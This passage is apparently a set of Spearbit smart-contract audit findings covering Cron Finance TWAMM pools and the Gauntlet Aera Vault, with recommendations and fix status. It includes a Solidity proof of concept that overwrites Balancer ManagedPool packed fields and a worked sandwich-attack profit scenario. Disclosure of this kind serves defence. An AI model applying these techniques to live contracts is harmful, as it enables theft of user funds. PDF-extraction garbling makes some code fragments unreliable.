IERC20(_token1), getVault(), _name, _symbol, poolType, ,! address(this), _pauser) ); //... Anyone can permissionlessly deploy a pool, with it then becoming the canonical pool for that pair of tokens. An attacker is able to pass a malicious _pauser the twamm pool, preventing the creation of a legitimate pool of the same type and tokens. This results in race conditions between altruistic and malicious pool deployers to set the admin for every token pair. 10 Malicious actors may grief the protocol by attempting to deploy token pairs with and exploiting the admin address, either deploying the pool in a paused state, effectively disabling trading for long-term swaps with the pool, pausing the pool at an unknown point in the future, setting fee and holding penalty parameters to inappropriate values, or setting illegitimate arbitrage partners and lists. This requires the factory owner to remove the admin of each pool individually and to set a new admin address, fee parameters, holding periods, pause state, and arbitrage partners in order to recover each pool to a usable condition if the griefing is successful. Recommendation: Remove the user defined _pauser parameter from pool creation and pass a default admin address to every pool on creation. Keep in mind that this default admin address is a singular point of centralization for the protocol. Consider deploying a Cron Finance governance address. Twamm: Addressed in commit 987f539. Created a 2/3 multisig safe that is the factory owner and default pool admin. Spearbit: Verified. +5.2.3 Refund Computation in _withdrawLongTermSwap Contains A Risky Underflow Severity: Low Risk Context: CronV1Pool.sol#L1937 Description: Nothing prevents lastVirtualOrderBlock from advancing beyond the expiry of any given long-term swap, so the unchecked subtraction here is unsafe and can underflow. Since the resulting refund value will be extremely large due to the limited number of blocks that can elapse and the typical prices and decimals of tokens, the practical consequence will be a revert due to exceeding the pool and order balances. However, this could be used to steal funds if the value could be maliciously tuned, for example via another hypothetical bug that allowed the last virtual order block or the sales rate of an order to be manipulated to an arbitrary value. Recommendation: Prevent the underflow in some way, either by explicitly checking for and reverting on attempts to cancel expired (i.e. filled) orders, or adding logic to skip refund calculation when expired orders are canceled. Twamm: Fixed in commit 8e52bfa. Spearbit: Verified. +5.2.4 Function transferJoinEvent Permits Transfer-to-Self Severity: Low Risk Context: JoinEventLib.sol#L71 Description: Though the error code indicates the opposite intent, this check will permit transfer-to-self (|| used instead of &&). Recommendation: Use && instead of ||. Twamm: Obsolete (join event logic removed). Spearbit: Verified. 11 +5.2.5 One-step owner change for factory owner Severity: Low Risk Context: CronV1PoolFactory.sol#L77 Description: The factory owner can be changed with a single transaction. As the factory owner is critical to managing the pool fees and other settings an incorrect address being set as the owner may result in unintended behaviors. Recommendation: Consider implementing a two-step pattern for ownership changes. Twamm: Resolved in commit 26058f7. Spearbit: Verified. Note that a one-step change is still possible using the _direct bool. However, the issue is mitigated. +5.2.6 Factory owner may front run large orders in order to extract fees Severity: Low Risk Context: CronV1Pool.sol#L1002, CronV1Pool.sol#L1531 Description: The factory owner may be able to front-run large trades in order to extract more fees if compromised or becomes malicious in one way or another. Similarly, pausing may also allow for skipping the execution of virtual orders before exiting. Recommendation: It is recommended to enforce that the factory owner is a 2/3 multisig. Twamm: Addressed in commit 987f539. Created a 2/3 multisig safe that is the factory owner and default pool admin. Spearbit: Verified. +5.2.7 Join Events must be explicitly transfered to recipient after transfering Balancer Pool Tokens in order to realize the full value of the tokens Severity: Low Risk Context: CronV1Pool.sol#L1116 Description: Any user receiving LP tokens transferred to them must be explicitly transferred with a join event in order to redeem the full value of the LP tokens on exit, otherwise the address transferred to will automatically get the holding penalty when they try to exit the pool. Unless a protocol specifically implements transferJoinEvent function compatibility all LP tokens going through that protocol will be worth a fraction of their true value even after the holding period has elapsed. Recommendation: Consider using OZ transfer hooks or overriding the balancer pool token's transfer function to automatically transfer joinEvents on token transfer. Although, this may increase the gas cost of an LP token transfer. Twamm: Fixed. Join Event / Holding Period & Penalty completely removed in commit 3130e41. Spearbit: Verified. 12 +5.2.8 Order Block Intervals(OBI) and Max Intervals are calculated with 14 second instead of 12 second block times Severity: Low Risk Context: alOrders.sol#L382 Constants.sol#L100-L107, CronV1Pool.sol#L1783-L1789, CronV1Pool.sol#L100, Virtu- Description: The CronV1Pool contract calculates both the Order Block Intervals (OBI) and the Max Intervals of the Stable/Liquid/Volatile pairs with 14 second block times. However, after the merge, 12 second block time is enforced by the Beacon Chain. Recommendation: It is recommended to calculate the Order Block Intervals(OBI) and the Max Intervals with 12 second block times. Twamm: Addressed in commit 74a4796 and commit ac2280a5. Spearbit: Verified. +5.2.9 One-step status change for pool Admins Severity: Low Risk Context: CronV1Pool.sol#L864 Description: Admin status can be changed in a single transaction. This may result in unintended behaviour if the incorrect address is passed. Recommendation: Consider implementing a two-step pattern. Twamm: Acknowledged. We can always reset the admin in case the wrong address gets set, so 2 step process might be overkill and will increase contract size. Spearbit: Acknowledged. +5.2.10 Incomplete token simulation in CronV1Pool due to missing queryJoin and queryExit functions Severity: Low Risk Context: CronV1Pool.sol#L76 Description: he CronV1Pool contract is missing the queryJoin and queryExit functions, which are significant for calculating maxAmountsIn and/or minBptOut on pool joins, and minAmountsOut and/or maxBptIn on pool exits, respectively. The ability to calculate these values is very important in order to ensure proper enforcement of slippage tolerances and mitigate the risk of sandwich attacks. Recommendation: CronV1Pool contract. It is recommended to consider adapting the queryJoin and queryExit functions in the Twamm: Sandwich protection for join (and testing for exit) was added as a mitigation for the "Overpayment of one side of LP Pair onJoinPool due to sandwich or user error" finding. The team will add queryJoin/queryExit in peripheries contracts. Spearbit: Verified. 13 +5.2.11 A partner can trigger ROC update Severity: Low Risk Context: CronV1Pool.sol#L1073 Description: A partner can trigger rook update if they return rook's current list within an update. • Scenario A partner calls updateArbitrageList, the IArbitrageurList(currentList).nextList() returns rook's rook- PartnerContractAddr and gets updated, the partner calls updateArbitrageList again, so this time isRook will be true. Recommendation: Consider adding a check if the partner returns rookPartnerContractAddr to revert. Twamm: Addressed in commit 850eb42 by removing the Rook specific implementation. Spearbit: Verified. +5.2.12 Approved relayer can steal cron's fees Severity: Low Risk Context: CronV1Pool.sol#L1826 Description: A relayer within Balancer is set per vault per address. If feeAddr will ever add a relayer within the balancer vault, the relayer can call exitPool with a recipient of their choice, and the check on line 225 will pass as the sender will still be feeAddr but the true msg.sender is the relayer. Recommendation: Consider setting as feeAddr a multisig between trusted parties to limit the possibility of ap- proving a relayer within the Balancer Vault for the feeAddr. There is no immediate action that can be done as the approved relayer functionality is part of the Balancer functionality. Twamm: The feeAddr will be an address controlled by multisig. No additional logic will be introduced in the smart contract to prohibit relayers as this will force feeAddr wallet to be an EOA and limit usability. Spearbit: Acknowledged. +5.2.13 Price Path Due To Long-Term Orders Neglected In Oracle Updates Severity: Low Risk Context: CronV1Pool.sol#L1564 Description: The _updateOracle() function takes its price sample as the final price after virtual order execution for whatever time period has elapsed since the last join/exit/swap. Since the price changes continuously during that interval if there are long-term orders active (unlike in Uniswap v2 where the price is constant between swaps), this is inaccurate - strictly speaking, one should integrate over the price curve as defined by LT orders to get a correct sample. The longer the interval, the greater the potential for inaccuracy. Recommendation: Consider accumulating oracle updates within the virtual order execution loop, or at least clearly document the potential for tracking errors in prices. Twamm: Fixed in commit b2339e6 , commit 2b48f50, and commit 08f96a1. Spearbit: Verified. 14 +5.2.14 Vulnerabilities noted from npm audit Severity: Low Risk Context: package.json#L37-L81 Description: npm audit notes: 76 vulnerabilities (5 low, 16 moderate, 27 high, 28 critical). Recommendation: Remove any unused dependencies and update or patch them elsewhere. Twamm: Resolved prod issues npm audit fix --only=prod in commit 8bd2644. Spearbit: Fixed. 5.3 Gas Optimization +5.3.1 Optimization: Merge CronV1Pool.sol & VirtualOrders.sol (Changes from dev team added to audit.) Severity: Gas Optimization Context: CronV1Pool.sol#L29 Description: A lot of needless parameter passing is done to accommodate the file barrier between CronV1Pool & VirtualOrdersLib, which is an internal library. Some parameters are actually immutable variables. Recommendation: Merging these two files and removing extra members from ExecuteVirtualOrdersMem struct will reduce gas use and contract size. Twamm: Addressed in commit 0d14f0a. Spearbit: Verified. +5.3.2 Receive sorted tokens at creation to reduce complexity Severity: Gas Optimization Context: CronV1Pool.sol#L491 Description: Currently, when a pool is created, within the constructor, logic is implemented to determine if the to- kens are sorted by address. A requirement that is needed for Balancer Pool creation. This logic adds unnecessary gas consumption and complexity throughout the contract as every time amounts are retrieved from balancer, the Cron Pool must check the order of the tokens and make sure that the difference between sorted (Balancer) and unsorted (Cron) token addresses is handled. An example can be seen in onJoinPool uint256 token0InU112 = amountsInU112[TOKEN0_IDX]; uint256 token1InU112 = amountsInU112[TOKEN1_IDX]; Where the amountsInU112 are retrieved from the balancer as a sorted array, index 0 == token0 and index 1 == token1, but on the Cron side, we must make sure that we retrieved the correct amount based on the tokens being sent as sorted or not when the pool was created. Recommendation: Make an explicit requirement within the constructor, in order for the tokens to be sorted require("_token0Inst < _token1Inst", ....); Twamm: Resolved in commit 26058f77. Spearbit: Verified. 15 +5.3.3 Remove double reentrancy checks Severity: Gas Optimization Context: CronV1Pool.onSwap, CronV1Pool.onJoinPool, CronV1Pool.onExitPool Description: A number of CronV1Pool functions include reentrancy checks, however, they are only callable from a Balancer Vault function that already has a reentrancy check. Recommendation: Exercise caution as changes to either Balancer or Cron may re-introduce risks. In cases where the only entry point to a CronV1Pool function is a Balancer Vault and the vault's function includes a nonReentrant modifier, the extra nonReentrant modifier on the CronV1Pool function may be removed. Twamm: Addressed in commit 756576a and commit 731059b. Spearbit: Verified. +5.3.4 TWAMM Formula Computation Can Be Made Correct-By-Construction and Optimized Severity: Gas Optimization Context: VirtualOrders.sol#L331-L336 Description: The linked lines are the core calculation of TWAMM virtual order execution. They involve checked arithmetic in the form of underflow-checked subtractions; there is thus a theoretical risk that rounding error could lead to a "freezing" of a TWAMM pool. One of the subtractions, that for token1OutU112, is already "correct-by- construction", i.e. it can never underflow. The calculation of token0OutU112 can be reformulated to be explicitly safe as well; the following overall refactoring is suggested: uint256 ammEndToken0 = (token1ReserveU112 * sum0) / sum1; uint256 ammEndToken1 = (token0ReserveU112 * sum1) / sum0; token0ReserveU112 = ammEndToken0; token1ReserveU112 = ammEndToken1; token0OutU112 = sum0 - ammEndToken0; token1OutU112 = sum1 - ammEndToken1; Both output calculations are now of the form x (cid:0) (x (cid:3) y)=(y + z) for non-negative x, y , and z, allowing subtraction operations to be unchecked, which is both a gas optimization and gives confidence the calculation cannot freeze up unexpectedly due to an underflow. Replacement of divDown by / gives equivalent semantics with lower overhead. An additional advantage of this formulation is its manifest symmetry under 0 < (cid:0) > 1 interchange; this serves as a useful heuristic check on the computation, as it should possess the same symmetry as the invariant. Recommendation: Reformulate as suggested above or in an analogous fashion. Twamm: Fixed in commit eb957842. Spearbit: Verified. +5.3.5 Gas Optimizations In Bit Packing Functions Severity: Gas Optimization Context: BitPacking.sol Description: The bit packing operations are heavily used throughout the gas-critical swap code path, the opti- mization of which was flagged as high-priority by the CronFi team. Thus they were carefully reviewed not just for correctness, but also for gas optimization. L119: unnecessary & due to check on L116 L175: could hardcode clearMask L203: could hardcode clearMask L240: could hardcode clearMask L241: unnecessary & due to check on line 237 L242: unnecessary & due to check on line 238 L292: could hardcode clearMask L328: could hardcode clearMask L343: unnecessary to mask when _isWord0 == true L359: unnecessary & operations due to checks on lines 356 and 357 L372: unnecessary masking L389: could hardcode clearMask L390: unnecessary & due to check on L387 L415: could 16 hardcode clearMask L416: unnecessary & operation due to check on line 413 L437: unnecessary clearMask L438: unnecessary & due to check on line 435 L464: could hardcode clearMask L465: unnecessary & due to check on line 462 Additionally, the following code pattern appears in multiple places: requireErrCode(increment <= CONST, CronErrors.INCREMENT_TOO_LARGE); value += increment; requireErrCode(value <= CONST, CronErrors.OVERFLOW); Unless there's a particular reason to want to detect a too-large increment separately from an overflow, these patterns could all be simplified to requireErrCode(CONST - value >= increment, CronErrors.OVERFLOW); value += increment; as any increment greater than CONST will cause overflow anyway and value is always in the correct range by construction. This allows CronErrors.INCREMENT_TOO_LARGE to be removed as well. Recommendation: If desired, these small optimizations can be made safely. Twamm: Fixed in commit cf80681. Error code optimization implemented as suggested, except for the incre- mentPairWithClampU96 method, absolute overflow of the container (U256) is checked instead of U96 because the clamping action would be subverted if the check were against MAX_U96. Measured contract size reduced by 187 bytes. Spearbit: Verified. +5.3.6 Using extra storage slot to store two mappings of the same information Severity: Gas Optimization Context: CronV1PoolFactory.sol#L69 Description: A second storage slot is used to store a duplicate mapping of the same token pair but in reverse order. If the tokens are sorted in a getter function then the second mapping does not need to be used. Recommendation: Remove the use of the second mapping and create a getter function that sorts the tokens before returning the mapping. Alternatively, if CREATE2 was used instead it could be used to calculate the deployment of a pool's address. Twamm: Resolved in: commit 26058f7. Spearbit: Fixed. +5.3.7 Gas optimizations within _executeVirtualOrders function Severity: Gas Optimization Context: CronV1Pool.sol#L1519:L1569 Description: Within the _executeVirtualOrders function there are a few gas optimizations that can be applied to reduce the contract size and gas consumed while the function is called. (!(virtualOrders.lastVirtualOrderBlock < _maxBlock && _maxBlock < block.number)) Is equivalent with: (virtualOrders.lastVirtualOrderBlock >= _maxBlock || _maxBlock >= block.number) This means that this always enters if _maxBlock == block.number which will result in unnecessary gas consump- tion. If cron fee is enabled, evoMem.feeShiftU3 will have a value meaning that the check on line 1536 is obsolete. Removing that check and the retrieve from storage will save gas. Recommendation: Consider implementing the above gas optimizations. 17 Twamm: Resolved in commit 3ae7fce and commit 6826034. Spearbit: Verified. +5.3.8 Initializing with default value is consuming unnecessary gas Severity: Gas Optimization Context: CronV1Pool.sol#L2102 Description: Every variable declaration followed by initialization with a default value is gas consuming and obso- lete. The provided line within the context is just an example. Recommendation: Consider going through the contracts and deleting any default initialization to save gas. Twamm: Addressed. Spearbit: Verified. +5.3.9 Factory requirement can be circumvented within the constructor Severity: Gas Optimization Context: CronV1Pool.sol#L484 Description: The constructor checks if the _factory parameter is the msg.sender. This behavior was, at first, created so that only the factory would be able to deploy pools. The check on line 484 is obsolete as pools deployed via the factory, will always have msg.sender == factory address, making the _factory parameter obsolete as well. Recommendation: Consider if it is necessary to include this check and just set the FACTORY as msg.sender to save gas. Twamm: Addressed in commit 26058f7. Spearbit: Verified. 5.4 Informational +5.4.1 Usability: added remove, set pool functionality to CronV1PoolFactory (Changes from dev team added to audit.) Severity: Informational Context: CronV1PoolFactory.sol#L49 Description: Conversations with the audit team indicated functions were needed to manage pool mappings post- creation in the event that a pool needed to be deprecated or replaced. Recommendation: Add a set and remove function to accomplish this. Twamm: Addressed in commit bad2211. Spearbit: Verified. 18 +5.4.2 Virtual oracle getter--gets oracle value at block > lvob (Changes from dev team added to audit.) Severity: Informational Context: CronV1Pool.sol#L274 Description: Through the audit process, sufficient contract space became available to add an oracle getter con- venience that returns the oracle values and timestamps. However, this leaves the problem of not being able to get the oracle price at the current block in a pool with low volume but virtual orders active. Recommendation: Introduce a way to get the virtual value of the oracle at a specified block number. Twamm: Addressed in commit 2b48f50. Spearbit: Verified. +5.4.3 Loss of assets due to rounding during _longTermSwap Severity: Informational Context: CronV1Pool.sol#L1752 Description: When a long term swap (LT) is created, the selling rate for that LT is set based on the amount and the number of blocks that order will be traded for. uint256 lastExpiryBlock = block.number - (block.number % ORDER_BLOCK_INTERVAL); uint256 orderExpiry = ORDER_BLOCK_INTERVAL * (_orderIntervals + 1) + lastExpiryBlock; // +1 protects from div 0 ,! uint256 tradeBlocks = orderExpiry - block.number; uint256 sellingRateU112 = _amountInU112 / tradeBlocks; During the computation of the number of blocks, the order must trade for, defined as tradeBlocks, the order expiry is computed from the last expiry block based on the OBI (Order Block Interval). If tradeBlocks is big enough (it can be a max of 176102 based on the STABLE_MAX_INTERVALS ), then sellingRa- teU112 will suffer a loss due to solidity rounding down behavior. This is a manageable loss for tokens with big decimals but for tokens with low decimals, will create quite an impact. E.g. wrapped BTC has 8 decimals. the MAX_ORDER_INTERVALS can be max 176102 as per stable max intervals defined within the constants. that being said a user can lose quite a significant value of BTC: 0.00176101 This issue is marked as Informational severity as the amount lost might not be that significant. This can change in the future if the token being LTed has a big value and a small number of decimals. Recommendation: Consider making this as transparent as possible to the users via frontend, additional docu- mentation might help as well when 3rd parties will want to integrate with the Cron Pool. Twamm: Acknowledged. Spearbit: Acknowledged. +5.4.4 Inaccuracies in Comments Severity: Informational Context: [1] BitPacking.sol#L52 [2] BitPacking.sol#L325 [3] JoinEventLib.sol#L16 [4] CronV1Pool.sol#L456 [5] Structs.sol#L193-L194 [6] VirtualOrders.sol#L64-L66 [7] VirtualOrders.sol#L123-124 [8] CronV1Pool.sol#L349 Description: A number of minor inaccuracies were discovered in comments that could impact the comprehensi- bility of the code to future maintainers, integrators, and extenders. [1] bit-0 should be bit-1 [2] less than should be at most [3] Maximally Extracted Value should be Maximal Extractable Value see flashbots.net [4] Maximally Extracted Value should be Maximal Extractable Value see flashbots.net [5] on these lines unsold should be sold [6] These comments are not applicable to the code block below them, as they mention looping but no looping is done; it seems they were copied over from the loop 19 on line 54. [7] These comments are not applicable to the code block below them, as they mention looping but no looping is done; it seems they were copied over from the loop on line 111. [8] omitted should be emitted Recommendation: Correct or otherwise fix the indicated issues in the comments. Twamm: [1] addressed in commit cf80681 [2] addressed in commit cf80681 [3] addressed in commit 0e2cc05; also, join events removed [4] addressed in commit ec2d92b [5] addressed in commit c903d4d [6] addressed in commit d632f85 [7] addressed in commit d632f85 [8] addressed in commit b1e11d6 Spearbit: Verified. +5.4.5 Unsupported SwapKind.GIVEN_OUT may limit the compatibility with Balancer Severity: Informational Context: CronV1Pool.sol#L599 Description: The Balancer protocol utilizes two types of swaps for its functionality - GIVEN_IN and GIVEN_OUT. • GIVEN_IN specifies the minimum amount of tokens a user would accept to receive from the swap. • GIVEN_OUT specifies the maximum amount of tokens a user would accept to send for the swap. However, the onSwap function of the CronV1Pool contract only accepts the IVault.SwapKind.GIVEN_IN value as the IVault.SwapKind field of the SwapRequest struct. The unsupported SwapKind.GIVEN_OUT may limit the compatibility with Balancer on the Batch Swaps and the Smart Order Router functionality, as a single SwapKind is given as an argument. Recommendation: In order to increase compatibility with Balancer, it is recommended to include support for the SwapKind.GIVEN_OUT functionality in the onSwap function. Twamm: Acknowledged. Spearbit: Acknowledged. +5.4.6 A pool's first LP will always take a minor loss on the value of their liquidity Severity: Informational Context: CronV1Pool.sol#L2046 Description: The first liquidity provider for a pool will always take a small loss on the value of their tokens deposited into the pool because 1000 balancer pool tokens are minted to the zero address on the initial deposit. As most tokens have 18 decimal places, this value would be negligible in most cases, however, for tokens with a high value and small decimals the effects may be more apparent. Recommendation: Document and ensure this behavior is known. Another option is to make the minimum liquidity configurable. Twamm: A warning has been written in the contract's comments. Addressed in commit 839ee51. Spearbit: Verified. 20 +5.4.7 The _withdrawCronFees functions should revert if no fees to withdraw Severity: Informational Context: CronV1Pool.sol#L1840 Description: The _withdrawCronFees checks if there are any Cron Fees that need to be withdrawn, currently, this function does not revert in case there are no fees. Recommendation: We recommend reverting in case there are no fees to withdraw, this will prevent unnecessary gas consumption if an admin calls this function. Twamm: Addressed in commit c4dfaa9. Spearbit: Verified. +5.4.8 Extend the functionality of getVirtualReserves function Severity: Informational Context: CronV1Pool.sol#L1250 Description: The getVirtualReserves function is a critical function within the Cron Pool. We recommend ex- panding a bit this function in order to make it more useful for 3rd parties to integrate with the pool. One suggestion is that the function is not parametrized with block number, in case something happens and this function runs out of gas because of the block.number - LVOB is too big, a block number parameter can save on debugging at least. A second suggestion is to add an extra parameter for isPaused requirement, as even if the pool is paused, diff --git a/findings_newupdate/spearbit/Gauntlet-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Gauntlet-Spearbit-Security-Review.txt new file mode 100644 index 0000000..0f2b431 --- /dev/null +++ b/findings_newupdate/spearbit/Gauntlet-Spearbit-Security-Review.txt @@ -0,0 +1,55 @@ +5.1.1 Important Balancer fields can be overwritten by EndTime Severity: Critical Risk Context: ManagedPool.sol#L75-L77, ManagedPool.sol#L84-L86, LegacyBasePool.sol, WordCodec.sol Description: Balancer’s ManagedPool uses 32 bit values for startTime and endTime but it does not verify if those values exist within that range. Values are stored in a 32-byte _miscData slot in BasePool via the insertUint32() function. Nevertheless, this function does not strip any excess bits, resulting in other fields stored in _miscData to be overwritten. In the version that Aera Vault uses only the "restrict LP" field can be overwritten and by carefully crafting the value of endTime, the "restrict LP" boolean can be switched off, allowing anyone to use joinPool. The Manager could cause this behavior via the updateWeightsGradually() function while the Owner could do it via enableTradingWithWeights(). Note: This issue has been reported to Balancer by the Spearbit team. contract ManagedPool is BaseWeightedPool, ReentrancyGuard { // f14de92ac443d6daf1f3a42025b1ecdb8918f22e 32 bits | 1 bit | | restrict LP | end time 32 bits | ] 7 bits | start time | total tokens | swap flag ] 1 bit | // [ 64 bits // [ reserved | // |MSB | 119 bits | unused function _startGradualWeightChange(uint256 startTime, uint256 endTime, ... ) ... { ... _setMiscData( _getMiscData().insertUint32(startTime, _START_TIME_OFFSET).insertUint32(endTime, ,! _END_TIME_OFFSET) ); // this convert the values to 32 bits ... } } In the latest version of ManagedPool many more fields can be overwritten, including: • LP flag • Fee end/Fee start • Swap flag contract ManagedPool is BaseWeightedPool, AumProtocolFeeCache, ReentrancyGuard { // current version // [ 64 bits ] // [ swap fee | LP flag | fee end | swap flag | fee start | end swap | end wgt | start wgt ] LSB| // |MSB 1 bit | 31 bits | | 31 bits 32 bits | 64 bits | 32 bits 1 bit | | The following POC shows how fields can be manipulated. // SPDX-License-Identifier: MIT pragma solidity ^0.8.13; import "hardhat/console.sol"; contract checkbalancer { uint256 private constant _MASK_1 = 2**(1) - 1; uint256 private constant _MASK_31 = 2**(31) - 1; uint256 private constant _MASK_32 = 2**(32) - 1; uint256 private constant _MASK_64 = 2**(64) - 1; uint256 private constant _MASK_192 = 2**(192) - 1; 5 | | 1 bit 64 bits | | 31 bits 1 bit | 31 bits | // [ 64 bits ] // [ swap fee | LP flag | fee end | swap flag | fee start | end swap | end wgt | start wgt ] LSB| // |MSB uint256 private constant _WEIGHT_START_TIME_OFFSET = 0; uint256 private constant _WEIGHT_END_TIME_OFFSET = 32; uint256 private constant _END_SWAP_FEE_PERCENTAGE_OFFSET = 64; uint256 private constant _FEE_START_TIME_OFFSET = 128; uint256 private constant _SWAP_ENABLED_OFFSET = 159; uint256 private constant _FEE_END_TIME_OFFSET = 160; uint256 private constant _MUST_ALLOWLIST_LPS_OFFSET = 191; uint256 private constant _SWAP_FEE_PERCENTAGE_OFFSET = 192; 32 bits | 32 bits function insertUint32(bytes32 word,uint256 value,uint256 offset) internal pure returns (bytes32) { bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_32 << offset)); return clearedWord | bytes32(value << offset); } function decodeUint31(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_31; } function decodeUint32(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_32; } function decodeUint64(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_64; } function decodeBool(bytes32 word, uint256 offset) internal pure returns (bool) { return (uint256(word >> offset) & _MASK_1) == 1; } function insertBits192(bytes32 word,bytes32 value,uint256 offset) internal pure returns (bytes32) { bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_192 << offset)); return clearedWord | bytes32((uint256(value) & _MASK_192) << offset); } constructor() { bytes32 poolState; bytes32 miscData; uint startTime = 1 + 2*2**32; uint endTime = 3 + 4*2**32 + 5*2**(32+64) + 2**(32+64+31) + 6*2**(32+64+31+1) + ,! 2**(32+64+31+1+31) + 7*2**(32+64+31+1+31+1); poolState = insertUint32(poolState,startTime, _WEIGHT_START_TIME_OFFSET); poolState = insertUint32(poolState,endTime, _WEIGHT_END_TIME_OFFSET); miscData = insertBits192(miscData,poolState,0); decodeUint32(miscData, console.log("startTime", console.log("endTime", decodeUint32(miscData, console.log("endSwapFeePercentage", decodeUint64(miscData, _WEIGHT_START_TIME_OFFSET)); // 1 // 3 _WEIGHT_END_TIME_OFFSET)); _END_SWAP_FEE_PERCENTAGE_OFFSET)); ,! // 4 console.log("Fee startTime", console.log("Swap enabled", console.log("Fee endTime", console.log("AllowlistLP", decodeUint31(miscData, decodeBool(miscData, decodeUint31(miscData, decodeBool(miscData, _FEE_START_TIME_OFFSET)); // 5 _SWAP_ENABLED_OFFSET)); // true _FEE_END_TIME_OFFSET)); // 6 _MUST_ALLOWLIST_LPS_OFFSET)); // ,! true console.log("Swap fee percentage", console.log("Swap fee percentage", decodeUint64(poolState, _SWAP_FEE_PERCENTAGE_OFFSET)); // 7 _SWAP_FEE_PERCENTAGE_OFFSET)); // 0 decodeUint64(miscData, due to miscData conversion } ,! } Recommendation: Make use of a ManagedPool.sol version which solves this issue. In the meantime, before any call is made to pool.updateWeightsGradually() verify that : 6 • startTime<= type(uint32).max • endTime <= type(uint32).max Gauntlet: Recommendation implemented in PR #145 Spearbit: Acknowledged. Recommendation has been implemented. +5.1.2 sweep function should prevent Treasury from withdrawing pool’s BPTs Severity: Critical Risk Context: AeraVaultV1.sol#L559-L561 Description: The current sweep() implementation allows the vault owner (the Treasury) to sweep any token owned by the vault including BPTs (Balancer Pool Tokens) that have been minted by the Vault during the pool’s initialDeposit() function call. The current vault implementation does not need those BPTs to withdraw funds because they are passed directly through the AssetManager flow via withdraw()/finalize(). Being able to withdraw BPTs would allow the Treasury to: • Withdraw funds without respecting the time period between initiateFinalization() and finalize() calls. • Withdraw funds without respecting Validator allowance() limits. • Withdraw funds without paying the manager’s fee for the last withdraw(). • finalize the pool, withdrawing all funds and selling valueless BPTs on the market. • Sell or rent out BPTs and withdraw() funds afterwards, thus doubling the funds. Swap fees would not be paid because Treasury could call setManager(newManager), where the new manager is someone controlled by the Treasury, subsequently calling setSwapFee(0) to remove the swap fee, which would be applied during an exitPool() event. Note: Once the BPT is retrieved it can also be used to call exitPool(), as the mustAllowlistLPs check is ignored in exitPool(). Recommendation: Add a check on the token input parameter to prevent Treasury from withdrawing the Pool’s BTP tokens. Gauntlet: Fixed in PR #132 Spearbit: Acknowledged. 5.2 High Risk +5.2.1 Manager can cause an immediate weight change Severity: High Risk Context: ManagedPool.sol#L254-L272, ManagedPool.sol#L620-L654, ManagedPool.sol#L680-L698 Description: Balancer’s ManagedPool uses 32 bit values for startTime and endTime but it does not verify if those values exist within that range. When endTime is set to 2**32 it becomes larger than startTime so the _require(startTime <= endTime, ...) statement will not revert. When endTime is converted to 32 bits it will get a value of 0, so in _calcu- lateWeightChangeProgress() the test if (currentTime >= endTime) ... will be true, causing the weight to immediately reach the end value. This way the Manager can cause an immediate weight change via the updateWeightsGradually() function and open arbitrage opportunities. Note: startTime is also subject to this overflow problem. Note: the same issues occur in the latest version of ManagedPool. Note: This issue has been reported to Balancer by the Spearbit team. 7 Also see the following issues: • Managed Pools are still undergoing development and may contain bugs and/or change significantly • Important fields of Balancer can be overwritten by EndTime contract ManagedPool is BaseWeightedPool, ReentrancyGuard { function updateWeightsGradually(uint256 startTime, uint256 endTime, ... ) { ... uint256 currentTime = block.timestamp; startTime = Math.max(currentTime, startTime); _require(startTime <= endTime, Errors.GRADUAL_UPDATE_TIME_TRAVEL); // will not revert if ,! endTime == 2**32 ... _startGradualWeightChange(startTime, endTime, _getNormalizedWeights(), endWeights, tokens); } function _startGradualWeightChange(uint256 startTime, uint256 endTime, ... ) ... { ... _setMiscData( _getMiscData().insertUint32(startTime, _START_TIME_OFFSET).insertUint32(endTime, ,! _END_TIME_OFFSET) ); // this convert the values to 32 bits ... } function _calculateWeightChangeProgress() private view returns (uint256) { uint256 currentTime = block.timestamp; bytes32 poolState = _getMiscData(); uint256 startTime = poolState.decodeUint32(_START_TIME_OFFSET); uint256 endTime = poolState.decodeUint32(_END_TIME_OFFSET); if (currentTime >= endTime) { // will be true if endTime == (2**32) capped to 32 bits == 0 return FixedPoint.ONE; } else ... ... } } Recommendation: Make use of a ManagedPool.sol version which solves this issue. In the meantime verify before pool.updateWeightsGradually() is called that: • startTime<= type(uint32).max • endTime <= type(uint32).max Gauntlet: Recommendation implemented in PR #145 Spearbit: Acknowledged. 8 +5.2.2 deposit and withdraw functions are susceptible to sandwich attacks Severity: High Risk Context: AeraVaultV1.sol#L402-L453, AeraVaultV1.sol#L456-L514 Description: Transactions calling the deposit() function are susceptible to sandwich attacks where an attacker can extract value from deposits. A similar issue exists in the withdraw() function but the minimum check on the pool holdings limits the attack’s impact. Consider the following scenario (swap fees ignored for simplicity): 1. Suppose the Balancer pool contains two tokens, WETH and DAI, and weights are 0.5 and 0.5. Currently, there is 1 WETH and 3k DAI in the pool and WETH spot price is 3k. 2. The Treasury wants to add another 3k DAI into the Aera vault, so it calls the deposit() function. 3. The attacker front-runs the Treasury’s transaction. They swap 3k DAI into the Balancer pool and get out 0.5 WETH. The weights remain 0.5 and 0.5, but because WETH and DAI balances become 0.5 and 6k, WETH’s spot price now becomes 12k. 4. Now, the Treasury’s transaction adds 3k DAI into the Balancer pool and upgrades the weights to 0.5*1.5: 0.5 = 0.6: 0.4. 5. The attacker back-runs the transaction and swaps the 0.5 WETH they got in step 3 back to DAI (and recovers the WETH’s spot price to near but above 3k). According to the current weights, they can get 9k*(1 - 1/r) = 3.33k DAI from the pool, where r = (2ˆ0.4)ˆ(1/0.6). 6. As a result the attacker profits 3.33k - 3k = 0.33k DAI. Recommendation: Potential mitigations include: • Adopting a two-step deposit and withdraw model. First, disable trading and check that the pool’s spot price is within range. If not, enable trading again and let arbitragers re-balance the pool. Once rebalanced, deposit or withdraw from the pool. Then enable trading again (possibly with weights). • Avoid depositing or withdrawing if the pool balance has changed in the same block. The lastChangeBlock variable stores the last block number where the pool balance was modified. By ensuring lastChangeBlock is less than the current block number, same-block sandwich attacks can be prevented. Still, this mitigation does not avoid multi-block MEV attacks. • Similar to slippage protection, add price boundaries as parameters to the deposit() and withdraw() func- tions to ensure pool’s spot price is within boundaries before and after deposit or withdrawal. Revert the transaction if boundaries are not met. • Use Flashbots to reduce sandwiching probabilities. Gauntlet: As discussed, this is a problem with spot price agnostic depositing into an AMM. V2 will introduce oracle-informed spot price 